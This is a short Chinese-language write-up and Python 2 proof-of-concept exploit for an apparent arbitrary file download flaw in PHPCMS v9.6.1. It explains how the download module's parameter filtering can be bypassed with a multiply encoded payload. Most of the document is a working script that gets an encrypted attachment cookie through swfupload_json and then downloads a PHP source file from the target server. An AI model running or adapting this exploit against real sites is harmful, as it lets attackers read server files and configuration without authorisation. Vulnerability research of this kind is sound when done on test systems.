• v9.6.1修复了9.6.0的注入和上传漏洞。
  不过在修复的时候检验变量出现问题，该漏洞仅存在于v9.6.1

• 漏洞的分析及修补方案在安全客

• 参数过滤 过程

swfupload_json -> safe_replace($_GET['src'])//f=p%3%252%270c -> down->init()
->safe_replace($a_k)//f=p%3%20C -> down->dawnload ->safe_replace($a_k) //f=p%3C

• 将9.6.0的payload改成s=./phpcms/modules/content/down.ph&f=p%3%25252%2*70C即可

#POC
#coding:utf-8
import requests
import re
url = 'http://192.168.42.133/phpcms/install_package/index.php'
s = requests.session()
params_get_userid = {
    'm':'wap',
    'c':'index',
    'siteid':'1',
}
rep = s.get(url,params=params_get_userid)
for cookie in rep.cookies:
    if '_siteid' in cookie.name:
        userid = cookie.value #userid为第一次加密的$this->userid
payload = '%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/modules/content/down.ph&f=p%3%25252%2*70C' 
url_get_encode = '{}?m=attachment&c=attachments&a=swfupload_json&aid=1&src={}'.format(url,payload)
data = {'userid_flash':userid}
rep = s.post(url_get_encode,data=data)
for cookie in rep.cookies:
    if '_att_json' in cookie.name:
        encode_payload = cookie.value
    
params = {
    'm':'content',
    'c':'down',
    'a_k':encode_payload,
}
rep = s.get(url,params=params)
content = rep.content#此时已经有下载链接了
file = re.findall(r'<a href="(.+?)"',content)[0]
print s.get(url+file).content